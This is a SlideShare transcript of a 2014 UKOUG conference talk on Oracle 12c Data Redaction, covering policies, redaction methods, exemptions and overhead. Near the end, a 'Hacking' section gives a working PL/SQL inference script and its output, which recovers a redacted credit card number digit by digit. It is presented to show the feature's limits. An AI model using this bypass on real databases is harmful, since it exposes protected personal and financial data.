SlideShare une entreprise Scribd logo

Oracle Data Redaction - UKOUG - TECH14

Alex Zaballa
Alex Zaballa

Oracle Data Redaction

Logiciels
1  sur  44
UKOUG Technology Conference & Exhibition 2014 8th – 10th December, ACC Liverpool Follow: @UKOUG
Oracle Data Redaction Follow: @UKOUG Presented by: Alex Zaballa, Oracle Solution Architect, Jupiter Daniel Da Meda, Oracle DBA, Jupiter
Follow: @UKOUG Alex Zaballa http://alexzaballa.blogspot.com/ @alexzaballa
Follow: @UKOUG Daniel Da Meda •18 Years of experience using Oracle Technologies •7 Years working as a Senior DBA in the UK for a variety of companies like TimeWarner, Johnson&Johnson, Network Rail and John Deere •Moved to Angola over 2 years ago where I continue to work Senior DBA providing services for the Ministry of Finance •Photographer Enthusiast http://thatoracledude.blogspot.com/ @ddameda daniel.da.meda@hotmail.com http://www.guoa.org/
Follow: @UKOUG contacto@jupiter.co.ao Ministry of Finance
Oracle Data Redaction Follow: @UKOUG
Follow: @UKOUG Data Redaction • One of the new features introduced in Oracle Database 12c • Part of the Advanced Security option • Enables the protection of data shown to the user in real time, without requiring changes to the application
• Applies protection at query execution time • The stored data remain unchanged Redaction takes place immediately preceding the return of selected data and only at the top level of a SELECT list • It is not an operation shown in the Follow: @UKOUG execution plan
Follow: @UKOUG Policy SELECT rep.object_name as "OBJECT", rep.policy_name, rep.expression, rep.enable, rec.column_name as "COLUMN", rec.function_type FROM redaction_policies rep, redaction_columns rec WHERE rep.object_owner = rec.object_owner AND rep.object_name = rec.object_name; OBJECT POLICY_NAME EXPRESSION ENABLE COLUMN FUNCTION_TYPE ------ ----------- ------------------------------------------------ ------ ------ -------------- EMP SCOTT_EMP SYS_CONTEXT('SYS_SESSION_ROLES','MGR') = 'FALSE' YES SALARY FULL REDACTION
SQL> EXPLAIN PLAN FOR SELECT * FROM EMP; SQL> SELECT * FROM table(DBMS_XPLAN.DISPLAY(format=>'ALL')); Follow: @UKOUG As SCOTT with the MGR role: -------------------------------------------------------------------------- | Id | Operation | Name | Rows | Bytes | Cost (%CPU)| Time | -------------------------------------------------------------------------- | 0 | SELECT STATEMENT | | 3 | 36 | 3 (0)| 00:00:01 | | 1 | TABLE ACCESS FULL| EMP | 3 | 36 | 3 (0)| 00:00:01 | -------------------------------------------------------------------------- As SCOTT without the MGR role: -------------------------------------------------------------------------- | Id | Operation | Name | Rows | Bytes | Cost (%CPU)| Time | -------------------------------------------------------------------------- | 0 | SELECT STATEMENT | | 3 | 36 | 3 (0)| 00:00:01 | | 1 | TABLE ACCESS FULL| EMP | 3 | 36 | 3 (0)| 00:00:01 | --------------------------------------------------------------------------
Not to be confused with Oracle Data Masking With Oracle Data Masking, the data is processed using masked shapes and this updated data is stored in new data blocks. For this reason, Data Masking is more suitable for non-production environments. ** Oracle Data Masking is available only with Enterprise Edition database and it requires licensing of Advanced Security. Follow: @UKOUG
Below are some other features that already existed to help making the data more secure: •Virtual Private Database (VPD) - Allows control access on both row and column levels by dynamically adding a predicate to SQL statements issued against the database. •Oracle Label Security – Allows you to add user-defined values to table records combining it with VPD to allow fine control of who sees what . •Database Vault – Data Redaction does not prevent privileged users (such as DBAs) from having access to the data being protected. To solve this, you can make use of Database Vault. Follow: @UKOUG
Planning on Oracle Data Redaction Policy 1. Ensure that you have been granted the EXECUTE privilege on Follow: @UKOUG the DBMS_REDACT PL/SQL package. 2. Determine the data type of the table or view column that you want to redact. 3. Ensure that this column is not used in an Oracle Virtual Private Database (VPD) row filtering condition. That is, it must not be part of the VPD predicate generated by the VPD policy function. 4. Decide on the type of redaction that you want to perform: full, random, partial, regular expressions, or none. 5. Decide which users to apply the Data Redaction policy to. 6. Based on this information, create the Data Redaction policy by using the DBMS_REDACT.ADD_POLICY procedure. 7. Configure the policy to have additional columns to be redacted
Conditional Redaction Examples •User Environment expression => 'SYS_CONTEXT(''USERENV'',''SESSION_USER'') = ''PSMITH''' •Database Role expression => 'SYS_CONTEXT(''SYS_SESSION_ROLES'',''SUPERVISOR'') = ''FALSE''' •Oracle Label Security Label Dominance expression => 'OLS_LABEL_DOMINATES (''hr_ols_pol'',''hs'') = 0' •Application Express Session States expression => 'V(''APP_USER'') != ''mavis@example.com'' or V(''APP_USER'') is null' Follow: @UKOUG
Follow: @UKOUG
Follow: @UKOUG DBMS_REDACT • DBMS_REDACT.ALTER_POLICY Allows changes to existing policies. • DBMS_REDACT.DISABLE_POLICY Disables an existing policy. • DBMS_REDACT.DROP_POLICY Drop an existing policy. • DBMS_REDACT.ENABLE_POLICY Enables an existing policy. • DBMS_REDACT.UPDATE_FULL_REDACTION_VALUES Change the default return value for full redaction. You must restart the database to take effect.
Follow: @UKOUG
Follow: @UKOUG Redaction Methods • Full redaction • Partial redaction • Regular expressions • Random redaction • No redaction
Follow: @UKOUG FULL Data Redaction •Character Data Types The output text is a single space •Number Data Types The output text is a zero •Date-Time Data Types The output text is set to the first day of January, 2001
Follow: @UKOUG RANDOM Data Redaction •CHAR Data Types Redacted in same character set and byte length as the column definition •Number Data Types Redacted in same character set and the length is limited based on the length of the actual data •Date-Time Data Types Redacted as random dates that are always different from those of the actual data
Follow: @UKOUG
Follow: @UKOUG Column data types NUMBER, BINARY_FLOAT, BINARY_DOUBLE, CHAR, VARCHAR2, NCHAR, NVARCHAR2, DATE, TIMESTAMP, TIMESTAMP WITH TIME ZONE, BLOB, CLOB, and NCLOB
Follow: @UKOUG
Follow: @UKOUG
Follow: @UKOUG
Follow: @UKOUG
Follow: @UKOUG
Follow: @UKOUG
Follow: @UKOUG
Follow: @UKOUG
Operational Activities - No Redaction •Backup and Restore •Import and Export •Patching and Upgrades •Replication •Users SYS and SYSTEM automatically have the EXEMPT REDACTION POLICY system privilege •Data Redaction is not enforced for users connected as SYSDBA Follow: @UKOUG
Data Redaction and Data Pump ORA-28081: Insufficient privileges - the command Follow: @UKOUG references a redacted object Use the EXEMPT REDACTION POLICY system privilege in these cases. However, use it with caution. Note that the role DATAPUMP_EXP_FULL_DATABASE includes the EXEMPT REDACTION POLICY system privilege
In order to perform a CREATE TABLE AS SELECT operation from a table protected by an active redaction policy, the user must have privileges to see the actual data on the source table Because applications may need to perform CREATE TABLE AS SELECT operations that involve redacted source columns, you can grant the application the EXEMPT DDL REDACTION POLICY system privilege. Follow: @UKOUG Data Redaction and CTAS
Redacted Columns and GROUP BY SQL Expressions Redacted Columns included in SQL expressions on a GROUP BY clause will fail as follows: SQL> select * from emp; EMP_NO NAME SALARY ---------- ---------------------------------------- ---------- 1 Daniel 702 2 Juca 607 3 Manuel 314 SQL> / EMP_NO NAME SALARY ---------- ---------------------------------------- ---------- 1 Daniel 900 2 Juca 466 3 Manuel 220 SQL> select (salary*1.10) from emp group by (salary*1.10); select (salary*1.10) from emp group by (salary*1.10) Follow: @UKOUG * ERROR at line 1: ORA-00979: not a GROUP BY expression
•Columns from MVIEWS as well as regular VIEWS can be redacted •Inline views are redacted outermost •VPD Inline view with the predicate is not affected as it acts on the actual values •Redaction policies defined on a VIEW column will override the redaction policy defined on the base table column. Example on next slide Follow: @UKOUG Data Redaction and Views SELECT XYZ … AS SELECT A… AS SELECT B… AS SELECT C… In the above example, SELECT XYZ is redacted first, then SELECT A, SELECT B and so on
Data Redaction and Views Consider the following Policy on column SALARY of table EMP OBJECT EXPRESSION ENABLE COLUMN FUNCTION_TYPE --------- -------------------------------------------------- ------ ------------- ---------------- EMP SYS_CONTEXT('SYS_SESSION_ROLES','MGR') = 'FALSE' YES SALARY RANDOM REDACTION Follow: @UKOUG A VIEW named EMP_V is created as follows: OBJECT EXPRESSION ENABLE COLUMN FUNCTION_TYPE --------- -------------------------------------------------- ------ ------------- ---------------- EMP_V SYS_CONTEXT('SYS_SESSION_ROLES','MGR') = 'FALSE' YES SALARY NO REDACTION
Follow: @UKOUG Data Redaction and Views Selecting from the EMP table: SQL> select * from emp where name='Daniel'; EMP_NO NAME SALARY ---------- ----------------------- ---------- 1 Daniel 706 SQL> select * from emp_v where name='Daniel'; EMP_NO NAME SALARY ---------- ----------------------- ---------- 1 Daniel 1001
Follow: @UKOUG Overhead • It could reach up to 10% of performance impact when using complex Regular Expressions • Between 2-3% performance impact using other redaction methods
•Never to be considered as a way to protect data from anyone with SQL access to the database •Extremely easy to hack once you have access to SQL •It was never designed to protect data from the attack we will demonstrate Follow: @UKOUG Hacking
Hacking - Finding Actual Values by Follow: @UKOUG Let’s consider the following Redaction Policy: BEGIN DBMS_REDACT.ADD_POLICY (OBJECT_SCHEMA => 'DDAMEDA', object_name => 'CUSTOMERS', policy_name => 'CREDIT_CARD_NO', expression => 'SYS_CONTEXT(''USERENV'', ''SESSION_USER'') = ''WATCHER'''); DBMS_REDACT.ALTER_POLICY (OBJECT_SCHEMA => 'DDAMEDA', object_name => 'CUSTOMERS', policy_name => 'CREDIT_CARD_NO', action => DBMS_REDACT.ADD_COLUMN, column_name => '"CREDITCARD_NO"', function_type => DBMS_REDACT.REGEXP , regexp_pattern => .*(dddd)$,regexp_replace_string => ************1,regexp_position => 1,regexp_occurrence => 1,regexp_match_parameter => i); END; Inference
Hacking - Finding Actual Values by Follow: @UKOUG Inference SQL> SHOW USER USER is "WATCHER“ SQL> SELECT * FROM customers; CUSTOMER_ID NAME CREDITCARD_NO ----------- -------------------- ---------------- 1 Daniel Da Meda ************4368 2 Alex Zaballa ************5211 3 Antonio Mateus ************5005
Hacking - Finding Actual Values by Follow: @UKOUG SET TIMING ON SET SERVEROUTPUT ON DECLARE vcreditcard_no CUSTOMERS.creditcard_no%TYPE; vcustomer_name CUSTOMERS.name%TYPE; BEGIN FOR a in 1..19 LOOP IF a NOT IN (5,10,15) THEN FOR b in 0..9 LOOP BEGIN SELECT name INTO vcustomer_name FROM CUSTOMERS WHERE customer_id=2 AND SUBSTR(creditcard_no,a,1) = b; vcreditcard_no:=vcreditcard_no||b; EXCEPTION WHEN NO_DATA_FOUND THEN NULL; END; END LOOP; ELSE vcreditcard_no:=vcreditcard_no||'-'; END IF; END LOOP; DBMS_OUTPUT.PUT_LINE('Credit Card Number for '||vcustomer_name||' is: '||vcreditcard_no); END; / Inference
Hacking - Finding Actual Values by Follow: @UKOUG vi get_creditcard.sql Inference [oracle@12c Desktop]$ sqlplus watcher/icanseeyou@pdbdev SQL*Plus: Release 12.1.0.2.0 Production on Wed Nov 5 11:26:53 2014 Copyright (c) 1982, 2014, Oracle. All rights reserved. Connected to: Oracle Database 12c Enterprise Edition Release 12.1.0.2.0 - 64bit Production With the Partitioning, Automatic Storage Management, OLAP, Advanced Analytics and Real Application Testing options SQL> @get_creditcard.sql Credit Card Number for Alex Zaballa is: 5102-6342-4881-5211 PL/SQL procedure successfully completed. Elapsed: 00:00:00.03
About UKOUG UKOUG exists to serve the Oracle community in the UK and Ireland. We act as a focal point for sharing knowledge about Oracle applications, technologies, tools and developments and, as an independent, not for profit membership organisation, represent the views of users and partners to Oracle. © Copyright 2014 UKOUG Contact User Group House 591-593 Kingston Road Wimbledon London SW20 8SA T: +44 (0)20 8545 9670 W: www.ukoug.org

Recommandé

Oracle Data Redaction
Oracle Data RedactionOracle Data Redaction
Oracle Data Redaction
Alex Zaballa
 
Oracle Data Redaction
Oracle Data RedactionOracle Data Redaction
Oracle Data Redaction
Alex Zaballa
 
Oracle Database 12c - Data Redaction
Oracle Database 12c - Data RedactionOracle Database 12c - Data Redaction
Oracle Database 12c - Data Redaction
Alex Zaballa
 
Oracle Data Redaction
Oracle Data RedactionOracle Data Redaction
Oracle Data Redaction
Ivica Arsov
 
Data Redaction - OTN TOUR LA 2015
Data Redaction - OTN TOUR LA 2015 Data Redaction - OTN TOUR LA 2015
Data Redaction - OTN TOUR LA 2015
Alex Zaballa
 
DBA Brasil 1.0 - DBA Commands and Concepts That Every Developer Should Know
DBA Brasil 1.0 - DBA Commands and Concepts That Every Developer Should KnowDBA Brasil 1.0 - DBA Commands and Concepts That Every Developer Should Know
DBA Brasil 1.0 - DBA Commands and Concepts That Every Developer Should Know
Alex Zaballa
 
Oracle Database 12.1.0.2 New Features
Oracle Database 12.1.0.2 New FeaturesOracle Database 12.1.0.2 New Features
Oracle Database 12.1.0.2 New Features
Alex Zaballa
 
Dan Hotka's Top 10 Oracle 12c New Features
Dan Hotka's Top 10 Oracle 12c New FeaturesDan Hotka's Top 10 Oracle 12c New Features
Dan Hotka's Top 10 Oracle 12c New Features
Embarcadero Technologies
 

Recommandé

Oracle Data Redaction
Oracle Data RedactionOracle Data Redaction
Oracle Data Redaction
Alex Zaballa
 
Oracle Data Redaction
Oracle Data RedactionOracle Data Redaction
Oracle Data Redaction
Alex Zaballa
 
Oracle Database 12c - Data Redaction
Oracle Database 12c - Data RedactionOracle Database 12c - Data Redaction
Oracle Database 12c - Data Redaction
Alex Zaballa
 
Oracle Data Redaction
Oracle Data RedactionOracle Data Redaction
Oracle Data Redaction
Ivica Arsov
 
Data Redaction - OTN TOUR LA 2015
Data Redaction - OTN TOUR LA 2015 Data Redaction - OTN TOUR LA 2015
Data Redaction - OTN TOUR LA 2015
Alex Zaballa
 
DBA Brasil 1.0 - DBA Commands and Concepts That Every Developer Should Know
DBA Brasil 1.0 - DBA Commands and Concepts That Every Developer Should KnowDBA Brasil 1.0 - DBA Commands and Concepts That Every Developer Should Know
DBA Brasil 1.0 - DBA Commands and Concepts That Every Developer Should Know
Alex Zaballa
 
Oracle Database 12.1.0.2 New Features
Oracle Database 12.1.0.2 New FeaturesOracle Database 12.1.0.2 New Features
Oracle Database 12.1.0.2 New Features
Alex Zaballa
 
Dan Hotka's Top 10 Oracle 12c New Features
Dan Hotka's Top 10 Oracle 12c New FeaturesDan Hotka's Top 10 Oracle 12c New Features
Dan Hotka's Top 10 Oracle 12c New Features
Embarcadero Technologies
 
OOW16 - Oracle Database 12c - The Best Oracle Database 12c New Features for D...
OOW16 - Oracle Database 12c - The Best Oracle Database 12c New Features for D...OOW16 - Oracle Database 12c - The Best Oracle Database 12c New Features for D...
OOW16 - Oracle Database 12c - The Best Oracle Database 12c New Features for D...
Alex Zaballa
 
Oracle Database 12c Release 2 - New Features On Oracle Database Exadata Expre...
Oracle Database 12c Release 2 - New Features On Oracle Database Exadata Expre...Oracle Database 12c Release 2 - New Features On Oracle Database Exadata Expre...
Oracle Database 12c Release 2 - New Features On Oracle Database Exadata Expre...
Alex Zaballa
 
Less08 Schema
Less08 SchemaLess08 Schema
Less08 Schema
vivaankumar
 
Tony Jambu (obscure) tools of the trade for tuning oracle sq ls
Tony Jambu (obscure) tools of the trade for tuning oracle sq lsTony Jambu (obscure) tools of the trade for tuning oracle sq ls
Tony Jambu (obscure) tools of the trade for tuning oracle sq ls
InSync Conference
 
View, Store Procedure & Function and Trigger in MySQL - Thaipt
View, Store Procedure & Function and Trigger in MySQL - ThaiptView, Store Procedure & Function and Trigger in MySQL - Thaipt
View, Store Procedure & Function and Trigger in MySQL - Thaipt
Framgia Vietnam
 
Oracle Data redaction - GUOB - OTN TOUR LA - 2015
Oracle Data redaction - GUOB - OTN TOUR LA - 2015Oracle Data redaction - GUOB - OTN TOUR LA - 2015
Oracle Data redaction - GUOB - OTN TOUR LA - 2015
Alex Zaballa
 
DBA Brasil 1.0 - DBA Commands and Concepts That Every Developer Should Know
DBA Brasil 1.0 - DBA Commands and Concepts That Every Developer Should KnowDBA Brasil 1.0 - DBA Commands and Concepts That Every Developer Should Know
DBA Brasil 1.0 - DBA Commands and Concepts That Every Developer Should Know
Alex Zaballa
 
Advanced MySQL Query Optimizations
Advanced MySQL Query OptimizationsAdvanced MySQL Query Optimizations
Advanced MySQL Query Optimizations
Dave Stokes
 
DBA Commands and Concepts That Every Developer Should Know - Part 2
DBA Commands and Concepts That Every Developer Should Know - Part 2DBA Commands and Concepts That Every Developer Should Know - Part 2
DBA Commands and Concepts That Every Developer Should Know - Part 2
Alex Zaballa
 
Oracle Database 12c - New Features for Developers and DBAs
Oracle Database 12c - New Features for Developers and DBAsOracle Database 12c - New Features for Developers and DBAs
Oracle Database 12c - New Features for Developers and DBAs
Alex Zaballa
 
2° Ciclo Microsoft CRUI 3° Sessione: l'evoluzione delle piattaforme tecnologi...
2° Ciclo Microsoft CRUI 3° Sessione: l'evoluzione delle piattaforme tecnologi...2° Ciclo Microsoft CRUI 3° Sessione: l'evoluzione delle piattaforme tecnologi...
2° Ciclo Microsoft CRUI 3° Sessione: l'evoluzione delle piattaforme tecnologi...
Jürgen Ambrosi
 
New fordevelopersinsql server2008
New fordevelopersinsql server2008New fordevelopersinsql server2008
New fordevelopersinsql server2008
Aaron Shilo
 
Oracle SQL Tuning
Oracle SQL TuningOracle SQL Tuning
Oracle SQL Tuning
Alex Zaballa
 
OTN TOUR 2016 - DBA Commands and Concepts That Every Developer Should Know
OTN TOUR 2016 - DBA Commands and Concepts That Every Developer Should KnowOTN TOUR 2016 - DBA Commands and Concepts That Every Developer Should Know
OTN TOUR 2016 - DBA Commands and Concepts That Every Developer Should Know
Alex Zaballa
 
Top 10 Oracle SQL tuning tips
Top 10 Oracle SQL tuning tipsTop 10 Oracle SQL tuning tips
Top 10 Oracle SQL tuning tips
Nirav Shah
 
TSQL in SQL Server 2012
TSQL in SQL Server 2012TSQL in SQL Server 2012
TSQL in SQL Server 2012
Eduardo Castro
 
Oracle database performance tuning
Oracle database performance tuningOracle database performance tuning
Oracle database performance tuning
Yogiji Creations
 
Five_Things_You_Might_Not_Know_About_Oracle_Database_v2.pptx
Five_Things_You_Might_Not_Know_About_Oracle_Database_v2.pptxFive_Things_You_Might_Not_Know_About_Oracle_Database_v2.pptx
Five_Things_You_Might_Not_Know_About_Oracle_Database_v2.pptx
Maria Colgan
 
D73549GC10_06.pptx
D73549GC10_06.pptxD73549GC10_06.pptx
D73549GC10_06.pptx
VLQuyNhn
 
Presentación Oracle Database Migración consideraciones 10g/11g/12c
Presentación Oracle Database Migración consideraciones 10g/11g/12cPresentación Oracle Database Migración consideraciones 10g/11g/12c
Presentación Oracle Database Migración consideraciones 10g/11g/12c
Ronald Francisco Vargas Quesada
 
Sql and PL/SQL Best Practices I
Sql and PL/SQL Best Practices ISql and PL/SQL Best Practices I
Sql and PL/SQL Best Practices I
Carlos Oliveira
 
Oracle SQL Tuning
Oracle SQL TuningOracle SQL Tuning
Oracle SQL Tuning
Alex Zaballa
 

Contenu connexe

Tendances

Tony Jambu (obscure) tools of the trade for tuning oracle sq ls
Tony Jambu (obscure) tools of the trade for tuning oracle sq lsTony Jambu (obscure) tools of the trade for tuning oracle sq ls
Tony Jambu (obscure) tools of the trade for tuning oracle sq ls
InSync Conference
 
View, Store Procedure & Function and Trigger in MySQL - Thaipt
View, Store Procedure & Function and Trigger in MySQL - ThaiptView, Store Procedure & Function and Trigger in MySQL - Thaipt
View, Store Procedure & Function and Trigger in MySQL - Thaipt
Framgia Vietnam
 
2° Ciclo Microsoft CRUI 3° Sessione: l'evoluzione delle piattaforme tecnologi...
2° Ciclo Microsoft CRUI 3° Sessione: l'evoluzione delle piattaforme tecnologi...2° Ciclo Microsoft CRUI 3° Sessione: l'evoluzione delle piattaforme tecnologi...
2° Ciclo Microsoft CRUI 3° Sessione: l'evoluzione delle piattaforme tecnologi...
Jürgen Ambrosi
 
New fordevelopersinsql server2008
New fordevelopersinsql server2008New fordevelopersinsql server2008
New fordevelopersinsql server2008
Aaron Shilo
 
Oracle database performance tuning
Oracle database performance tuningOracle database performance tuning
Oracle database performance tuning
Yogiji Creations
 

Tendances (17)

OOW16 - Oracle Database 12c - The Best Oracle Database 12c New Features for D...
OOW16 - Oracle Database 12c - The Best Oracle Database 12c New Features for D...OOW16 - Oracle Database 12c - The Best Oracle Database 12c New Features for D...
OOW16 - Oracle Database 12c - The Best Oracle Database 12c New Features for D...
 
Oracle Database 12c Release 2 - New Features On Oracle Database Exadata Expre...
Oracle Database 12c Release 2 - New Features On Oracle Database Exadata Expre...Oracle Database 12c Release 2 - New Features On Oracle Database Exadata Expre...
Oracle Database 12c Release 2 - New Features On Oracle Database Exadata Expre...
 
Less08 Schema
Less08 SchemaLess08 Schema
Less08 Schema
 
Tony Jambu (obscure) tools of the trade for tuning oracle sq ls
Tony Jambu (obscure) tools of the trade for tuning oracle sq lsTony Jambu (obscure) tools of the trade for tuning oracle sq ls
Tony Jambu (obscure) tools of the trade for tuning oracle sq ls
 
View, Store Procedure & Function and Trigger in MySQL - Thaipt
View, Store Procedure & Function and Trigger in MySQL - ThaiptView, Store Procedure & Function and Trigger in MySQL - Thaipt
View, Store Procedure & Function and Trigger in MySQL - Thaipt
 
Oracle Data redaction - GUOB - OTN TOUR LA - 2015
Oracle Data redaction - GUOB - OTN TOUR LA - 2015Oracle Data redaction - GUOB - OTN TOUR LA - 2015
Oracle Data redaction - GUOB - OTN TOUR LA - 2015
 
DBA Brasil 1.0 - DBA Commands and Concepts That Every Developer Should Know
DBA Brasil 1.0 - DBA Commands and Concepts That Every Developer Should KnowDBA Brasil 1.0 - DBA Commands and Concepts That Every Developer Should Know
DBA Brasil 1.0 - DBA Commands and Concepts That Every Developer Should Know
 
Advanced MySQL Query Optimizations
Advanced MySQL Query OptimizationsAdvanced MySQL Query Optimizations
Advanced MySQL Query Optimizations
 
DBA Commands and Concepts That Every Developer Should Know - Part 2
DBA Commands and Concepts That Every Developer Should Know - Part 2DBA Commands and Concepts That Every Developer Should Know - Part 2
DBA Commands and Concepts That Every Developer Should Know - Part 2
 
Oracle Database 12c - New Features for Developers and DBAs
Oracle Database 12c - New Features for Developers and DBAsOracle Database 12c - New Features for Developers and DBAs
Oracle Database 12c - New Features for Developers and DBAs
 
2° Ciclo Microsoft CRUI 3° Sessione: l'evoluzione delle piattaforme tecnologi...
2° Ciclo Microsoft CRUI 3° Sessione: l'evoluzione delle piattaforme tecnologi...2° Ciclo Microsoft CRUI 3° Sessione: l'evoluzione delle piattaforme tecnologi...
2° Ciclo Microsoft CRUI 3° Sessione: l'evoluzione delle piattaforme tecnologi...
 
New fordevelopersinsql server2008
New fordevelopersinsql server2008New fordevelopersinsql server2008
New fordevelopersinsql server2008
 
Oracle SQL Tuning
Oracle SQL TuningOracle SQL Tuning
Oracle SQL Tuning
 
OTN TOUR 2016 - DBA Commands and Concepts That Every Developer Should Know
OTN TOUR 2016 - DBA Commands and Concepts That Every Developer Should KnowOTN TOUR 2016 - DBA Commands and Concepts That Every Developer Should Know
OTN TOUR 2016 - DBA Commands and Concepts That Every Developer Should Know
 
Top 10 Oracle SQL tuning tips
Top 10 Oracle SQL tuning tipsTop 10 Oracle SQL tuning tips
Top 10 Oracle SQL tuning tips
 
TSQL in SQL Server 2012
TSQL in SQL Server 2012TSQL in SQL Server 2012
TSQL in SQL Server 2012
 
Oracle database performance tuning
Oracle database performance tuningOracle database performance tuning
Oracle database performance tuning
 

Similaire à Oracle Data Redaction - UKOUG - TECH14

D73549GC10_06.pptx
D73549GC10_06.pptxD73549GC10_06.pptx
D73549GC10_06.pptx
VLQuyNhn
 
(Lab Project) (2)Table of ContentsIntroduction.docx
(Lab Project) (2)Table of ContentsIntroduction.docx (Lab Project) (2)Table of ContentsIntroduction.docx
(Lab Project) (2)Table of ContentsIntroduction.docx
aryan532920
 
Understanding Query Optimization with ‘regular’ and ‘Exadata’ Oracle
Understanding Query Optimization with ‘regular’ and ‘Exadata’ OracleUnderstanding Query Optimization with ‘regular’ and ‘Exadata’ Oracle
Understanding Query Optimization with ‘regular’ and ‘Exadata’ Oracle
Guatemala User Group
 

Similaire à Oracle Data Redaction - UKOUG - TECH14 (20)

Five_Things_You_Might_Not_Know_About_Oracle_Database_v2.pptx
Five_Things_You_Might_Not_Know_About_Oracle_Database_v2.pptxFive_Things_You_Might_Not_Know_About_Oracle_Database_v2.pptx
Five_Things_You_Might_Not_Know_About_Oracle_Database_v2.pptx
 
D73549GC10_06.pptx
D73549GC10_06.pptxD73549GC10_06.pptx
D73549GC10_06.pptx
 
Presentación Oracle Database Migración consideraciones 10g/11g/12c
Presentación Oracle Database Migración consideraciones 10g/11g/12cPresentación Oracle Database Migración consideraciones 10g/11g/12c
Presentación Oracle Database Migración consideraciones 10g/11g/12c
 
Sql and PL/SQL Best Practices I
Sql and PL/SQL Best Practices ISql and PL/SQL Best Practices I
Sql and PL/SQL Best Practices I
 
Oracle SQL Tuning
Oracle SQL TuningOracle SQL Tuning
Oracle SQL Tuning
 
Performance Stability, Tips and Tricks and Underscores
Performance Stability, Tips and Tricks and UnderscoresPerformance Stability, Tips and Tricks and Underscores
Performance Stability, Tips and Tricks and Underscores
 
Getting Started with MySQL II
Getting Started with MySQL IIGetting Started with MySQL II
Getting Started with MySQL II
 
Oracle Query Optimizer - An Introduction
Oracle Query Optimizer - An IntroductionOracle Query Optimizer - An Introduction
Oracle Query Optimizer - An Introduction
 
2011 Collaborate IOUG Presentation
2011 Collaborate IOUG Presentation2011 Collaborate IOUG Presentation
2011 Collaborate IOUG Presentation
 
Part1 of SQL Tuning Workshop - Understanding the Optimizer
Part1 of SQL Tuning Workshop - Understanding the OptimizerPart1 of SQL Tuning Workshop - Understanding the Optimizer
Part1 of SQL Tuning Workshop - Understanding the Optimizer
 
Best Practices for Oracle Exadata and the Oracle Optimizer
Best Practices for Oracle Exadata and the Oracle OptimizerBest Practices for Oracle Exadata and the Oracle Optimizer
Best Practices for Oracle Exadata and the Oracle Optimizer
 
(Lab Project) (2)Table of ContentsIntroduction.docx
(Lab Project) (2)Table of ContentsIntroduction.docx (Lab Project) (2)Table of ContentsIntroduction.docx
(Lab Project) (2)Table of ContentsIntroduction.docx
 
DBA Commands and Concepts That Every Developer Should Know - Part 2
DBA Commands and Concepts That Every Developer Should Know - Part 2DBA Commands and Concepts That Every Developer Should Know - Part 2
DBA Commands and Concepts That Every Developer Should Know - Part 2
 
05_DP_300T00A_Optimize.pptx
05_DP_300T00A_Optimize.pptx05_DP_300T00A_Optimize.pptx
05_DP_300T00A_Optimize.pptx
 
Beginners guide to_optimizer
Beginners guide to_optimizerBeginners guide to_optimizer
Beginners guide to_optimizer
 
Understanding Query Optimization with ‘regular’ and ‘Exadata’ Oracle
Understanding Query Optimization with ‘regular’ and ‘Exadata’ OracleUnderstanding Query Optimization with ‘regular’ and ‘Exadata’ Oracle
Understanding Query Optimization with ‘regular’ and ‘Exadata’ Oracle
 
Managing Oracle Streams Using Enterprise Manager Grid Control
Managing Oracle Streams Using Enterprise Manager Grid ControlManaging Oracle Streams Using Enterprise Manager Grid Control
Managing Oracle Streams Using Enterprise Manager Grid Control
 
SQL Tunning
SQL TunningSQL Tunning
SQL Tunning
 
ORACLE CORE DBA ONLINE TRAINING
ORACLE CORE DBA ONLINE TRAININGORACLE CORE DBA ONLINE TRAINING
ORACLE CORE DBA ONLINE TRAINING
 
Oracle core dba online training
Oracle core dba online trainingOracle core dba online training
Oracle core dba online training
 

Plus de Alex Zaballa

Plus de Alex Zaballa (20)

Migrating Oracle Databases from AWS to OCI
Migrating Oracle Databases from AWS to OCIMigrating Oracle Databases from AWS to OCI
Migrating Oracle Databases from AWS to OCI
 
Exploring All options to move your Oracle Databases to the Oracle Cloud
Exploring All options to move your Oracle Databases to the Oracle CloudExploring All options to move your Oracle Databases to the Oracle Cloud
Exploring All options to move your Oracle Databases to the Oracle Cloud
 
Moving Your Oracle Databases To The Oracle Cloud
Moving Your Oracle Databases To The Oracle CloudMoving Your Oracle Databases To The Oracle Cloud
Moving Your Oracle Databases To The Oracle Cloud
 
SQL TUNING 101
SQL TUNING 101SQL TUNING 101
SQL TUNING 101
 
SQL TUNING 101
SQL TUNING 101SQL TUNING 101
SQL TUNING 101
 
DBA Commands and Concepts That Every Developer Should Know
DBA Commands and Concepts That Every Developer Should KnowDBA Commands and Concepts That Every Developer Should Know
DBA Commands and Concepts That Every Developer Should Know
 
LET’S GET STARTED WITH ORACLE DATABASE CLOUD
LET’S GET STARTED WITH ORACLE DATABASE CLOUDLET’S GET STARTED WITH ORACLE DATABASE CLOUD
LET’S GET STARTED WITH ORACLE DATABASE CLOUD
 
DBA Commands and Concepts That Every Developer Should Know
DBA Commands and Concepts That Every Developer Should KnowDBA Commands and Concepts That Every Developer Should Know
DBA Commands and Concepts That Every Developer Should Know
 
Oracle Database 12c - New Features for Developers and DBAs
Oracle Database 12c - New Features for Developers and DBAsOracle Database 12c - New Features for Developers and DBAs
Oracle Database 12c - New Features for Developers and DBAs
 
DBA Brasil 1.0 - DBA Commands and Concepts That Every Developer Should Know
DBA Brasil 1.0 - DBA Commands and Concepts That Every Developer Should KnowDBA Brasil 1.0 - DBA Commands and Concepts That Every Developer Should Know
DBA Brasil 1.0 - DBA Commands and Concepts That Every Developer Should Know
 
Moving your Oracle Databases to the Oracle Cloud
Moving your Oracle Databases to the Oracle CloudMoving your Oracle Databases to the Oracle Cloud
Moving your Oracle Databases to the Oracle Cloud
 
Os melhores recursos novos do Oracle Database 12c para desenvolvedores e DBAs...
Os melhores recursos novos do Oracle Database 12c para desenvolvedores e DBAs...Os melhores recursos novos do Oracle Database 12c para desenvolvedores e DBAs...
Os melhores recursos novos do Oracle Database 12c para desenvolvedores e DBAs...
 
OTN TOUR 2016 - DBA Commands and Concepts That Every Developer Should Know
OTN TOUR 2016 - DBA Commands and Concepts That Every Developer Should KnowOTN TOUR 2016 - DBA Commands and Concepts That Every Developer Should Know
OTN TOUR 2016 - DBA Commands and Concepts That Every Developer Should Know
 
OTN TOUR 2016 - Oracle Database 12c - The Best Oracle Database 12c Tuning Fea...
OTN TOUR 2016 - Oracle Database 12c - The Best Oracle Database 12c Tuning Fea...OTN TOUR 2016 - Oracle Database 12c - The Best Oracle Database 12c Tuning Fea...
OTN TOUR 2016 - Oracle Database 12c - The Best Oracle Database 12c Tuning Fea...
 
